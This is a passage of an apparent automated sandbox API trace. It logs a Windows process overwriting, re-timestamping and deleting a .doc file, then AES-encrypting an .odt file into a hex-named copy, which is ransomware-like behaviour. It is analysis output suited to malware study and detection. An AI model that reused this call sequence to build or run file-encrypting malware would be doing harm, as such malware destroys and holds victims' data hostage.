lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca746f00, ftCreationTime.dwHighDateTime=0x1d4ce2f, ftLastAccessTime.dwLowDateTime=0x63e194e0, ftLastAccessTime.dwHighDateTime=0x1d4c81a, ftLastWriteTime.dwLowDateTime=0x63e194e0, ftLastWriteTime.dwHighDateTime=0x1d4c81a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0076.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.343] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", dwFileAttributes=0x80) returned 1 [0076.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.344] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), fInfoLevelId=0x0, lpFileInformation=0x2314060 | out: lpFileInformation=0x2314060*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xca746f00, ftCreationTime.dwHighDateTime=0x1d4ce2f, ftLastAccessTime.dwLowDateTime=0x63e194e0, ftLastAccessTime.dwHighDateTime=0x1d4c81a, ftLastWriteTime.dwLowDateTime=0x63e194e0, ftLastWriteTime.dwHighDateTime=0x1d4c81a, nFileSizeHigh=0x0, nFileSizeLow=0x734)) returned 1 [0076.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.344] GetFileType (hFile=0x36c) returned 0x1 [0076.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.344] GetFileType (hFile=0x36c) returned 0x1 [0076.345] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.345] WriteFile (in: hFile=0x36c, lpBuffer=0x2314528*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2314528*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x800, lpOverlapped=0x0) returned 1 [0076.345] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.345] WriteFile (in: hFile=0x36c, lpBuffer=0x2314528*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2314528*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x800, lpOverlapped=0x0) returned 1 [0076.346] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.350] WriteFile (in: hFile=0x36c, lpBuffer=0x2314528*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2314528*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x800, lpOverlapped=0x0) returned 1 [0076.350] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.350] WriteFile (in: hFile=0x36c, lpBuffer=0x2314528*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x2314528*, lpNumberOfBytesWritten=0x1bf5d1a8*=0x800, lpOverlapped=0x0) returned 1 [0076.351] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.351] SetEndOfFile (hFile=0x36c) returned 1 [0076.351] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.351] CloseHandle (hObject=0x36c) returned 1 [0076.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.352] GetFileType (hFile=0x36c) returned 0x1 [0076.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.352] GetFileType (hFile=0x36c) returned 0x1 [0076.352] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.352] CloseHandle (hObject=0x36c) returned 1 [0076.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.352] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.352] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.352] GetFileType (hFile=0x36c) returned 0x1 [0076.352] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.352] GetFileType (hFile=0x36c) returned 0x1 [0076.352] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.353] CloseHandle (hObject=0x36c) returned 1 [0076.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.353] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.353] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.353] GetFileType (hFile=0x36c) returned 0x1 [0076.353] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.353] GetFileType (hFile=0x36c) returned 0x1 [0076.353] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.353] CloseHandle (hObject=0x36c) returned 1 [0076.353] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.353] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\ke7llvsmwy2so.doc")) returned 1 [0076.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\Ke7lLvSmwY2sO.doc", lpFilePart=0x0) returned 0x42 [0076.354] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", lpFilePart=0x0) returned 0x51 [0076.354] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.355] GetFileType (hFile=0x36c) returned 0x1 [0076.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.355] GetFileType (hFile=0x36c) returned 0x1 [0076.355] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d318, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.355] CloseHandle (hObject=0x36c) returned 1 [0076.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", lpFilePart=0x0) returned 0x51 [0076.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.355] GetFileType (hFile=0x36c) returned 0x1 [0076.355] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.355] GetFileType (hFile=0x36c) returned 0x1 [0076.355] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d318, lpLastWriteTime=0x0) returned 1 [0076.355] CloseHandle (hObject=0x36c) returned 1 [0076.355] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", nBufferLength=0x105, lpBuffer=0x1bf5cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1", lpFilePart=0x0) returned 0x51 [0076.355] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0b0) returned 1 [0076.355] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\366B759E50279A7798964EF488BBF6F1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\366b759e50279a7798964ef488bbf6f1"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.356] GetFileType (hFile=0x36c) returned 0x1 [0076.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d020) returned 1 [0076.356] GetFileType (hFile=0x36c) returned 0x1 [0076.356] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d318) returned 1 [0076.356] CloseHandle (hObject=0x36c) returned 1 [0076.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.357] CryptAcquireContextW (in: phProv=0x1bf5d168, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5d168*=0x1a5b7a10) returned 1 [0076.358] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x2317a58, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d120 | out: phKey=0x1bf5d120*=0x1a626e50) returned 1 [0076.358] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.358] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5d230 | out: pbData=0x0*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.358] CryptExportKey (in: hKey=0x1a626e50, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2317b48, pdwDataLen=0x1bf5d230 | out: pbData=0x2317b48*, pdwDataLen=0x1bf5d230*=0x1c) returned 1 [0076.358] CryptImportKey (in: hProv=0x1a5b7a10, pbData=0x2317c68, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.358] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.358] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.358] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626c90) returned 1 [0076.358] CryptContextAddRef (hProv=0x1a5b7a10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.358] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x4, pbData=0x2317db0*=0x1, dwFlags=0x0) returned 1 [0076.358] CryptSetKeyParam (hKey=0x1a626c90, dwParam=0x1, pbData=0x2317d60, dwFlags=0x0) returned 1 [0076.358] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.358] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.358] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt", lpFilePart=0x0) returned 0x3d [0076.358] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\kRK-4zIM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\krk-4zim.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.359] GetFileType (hFile=0x36c) returned 0x1 [0076.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.359] GetFileType (hFile=0x36c) returned 0x1 [0076.359] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", lpFilePart=0x0) returned 0x51 [0076.359] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.359] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.359] GetFileType (hFile=0x3a4) returned 0x1 [0076.359] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.359] GetFileType (hFile=0x3a4) returned 0x1 [0076.359] ReadFile (in: hFile=0x36c, lpBuffer=0x2318180, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2318180*, lpNumberOfBytesRead=0x1bf5d128*=0xab5f, lpOverlapped=0x0) returned 1 [0076.360] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x232c198*, pdwDataLen=0x1bf5d180*=0xab50, dwBufLen=0xab50 | out: pbData=0x232c198*, pdwDataLen=0x1bf5d180*=0xab50) returned 1 [0076.361] WriteFile (in: hFile=0x3a4, lpBuffer=0x232c198*, nNumberOfBytesToWrite=0xab50, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x232c198*, lpNumberOfBytesWritten=0x1bf5d118*=0xab50, lpOverlapped=0x0) returned 1 [0076.362] ReadFile (in: hFile=0x36c, lpBuffer=0x2318180, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2318180*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.362] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2336d28*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x2336d28*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.362] CryptEncrypt (in: hKey=0x1a626c90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2336d78*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x2336d78*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.362] WriteFile (in: hFile=0x3a4, lpBuffer=0x2336dc8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x2336dc8*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.363] CloseHandle (hObject=0x3a4) returned 1 [0076.364] CloseHandle (hObject=0x36c) returned 1 [0076.364] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.364] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.364] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1", lpFilePart=0x0) returned 0x51 [0076.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\F0BC06E28C52DE780677CE82EBA6DBF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\f0bc06e28c52de780677ce82eba6dbf1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.364] GetFileType (hFile=0x36c) returned 0x1 [0076.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.364] GetFileType (hFile=0x36c) returned 0x1 [0076.364] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.365] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.366] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.367] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.368] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.368] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0xb60, lpOverlapped=0x0) returned 1 [0076.369] ReadFile (in: hFile=0x36c, lpBuffer=0x23384d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x23384d0*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.369] CloseHandle (hObject=0x36c) returned 1 [0076.379] GetFullPathNameW (in: 